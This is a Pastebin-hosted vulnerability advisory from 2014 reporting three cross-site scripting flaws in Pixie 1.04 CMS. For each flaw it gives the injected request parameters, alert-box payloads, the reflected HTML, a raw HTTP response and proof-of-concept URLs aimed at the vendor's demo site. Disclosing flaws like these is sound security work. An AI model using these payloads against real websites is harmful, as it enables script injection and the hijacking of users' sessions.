Advertisement
AndrewHaxalot

Pixie 1.04 CMS - Multiple XSS Vulnerabilities

Jan 28th, 2014
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.79 KB | None | 0 0
  1. #Title: Pixie 1.04 CMS - Multiple XSS
  2. #Version: 1.04 (Latest ATM)
  3. #Vendor: getpixie.co.uk
  4. #Demo: demo.getpixie.co.uk
  5. #Date: 01.26.2014
  6. #Contact: smash[at]devilteam.pl
  7.  
  8. 1. Cross Site Scripting - GET 'm' parameter
  9.  
  10. Request:
  11. host/?s=login&m=forgotten" onload=alert(666) bad="
  12.  
  13. Injection point:
  14. <body class="pixie y2014 m1 d26 h12 s_login m_forgotten\" onload=alert(666) bad=\"">
  15.  
  16. PoC:
  17. demo.getpixie.co.uk/admin/?s=login&m=forgotten" onload=alert(666) bad="
  18.  
  19. 2. Cross Site Scripting - POST message
  20.  
  21. Request:
  22. POST /admin/admin/modules/ajax_message.php HTTP/1.1
  23. Host: demo.getpixie.co.uk
  24.  
  25. message=<script>alert(666)</script>
  26.  
  27. Response:
  28. HTTP/1.1 200 OK
  29. Date: Sun, 26 Jan 2014 12:08:09 GMT
  30. Server: Apache
  31. X-Powered-By: PHP/5.3.28
  32. Cache-Control: max-age=1
  33. Expires: Sun, 26 Jan 2014 12:08:10 GMT
  34. Content-Length: 264
  35. Keep-Alive: timeout=2
  36. Connection: Keep-Alive
  37. Content-Type: text/html; charset=utf-8
  38.  
  39.  
  40. <span class="message_text_error"><img src="admin/theme/images/icons/error.png" /><script>alert(666)</script></span><span class="message_back"> (<a href="javascript:history.go(-1);" title="Back (Will reload any submitted form data)">go back &raquo;</a>)</span>
  41.  
  42. 3. Cross Site Scripting - GET 'x' parameter
  43.  
  44. Request:
  45. host/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
  46.  
  47. Injection point:
  48.  
  49. <body class="pixie y2014 m1 d26 h12 s_login m_static x_page-1\" onload=alert(666) bad=\"">
  50. (...)
  51. <script type="text/javascript" src="jscript/pixie.js.php?s=login&amp;x=page-1\" onload=alert(666) bad=\"&amp;advmode=Toggle advanced Mode"></script>
  52.  
  53. PoC:
  54. demo.getpixie.co.uk/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
  55.  
  56. 4.
  57.  
  58. # DC72E3C143B5E0DE 1337day.com [2014-01-28] C9DE7F0E49DF30F3 #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement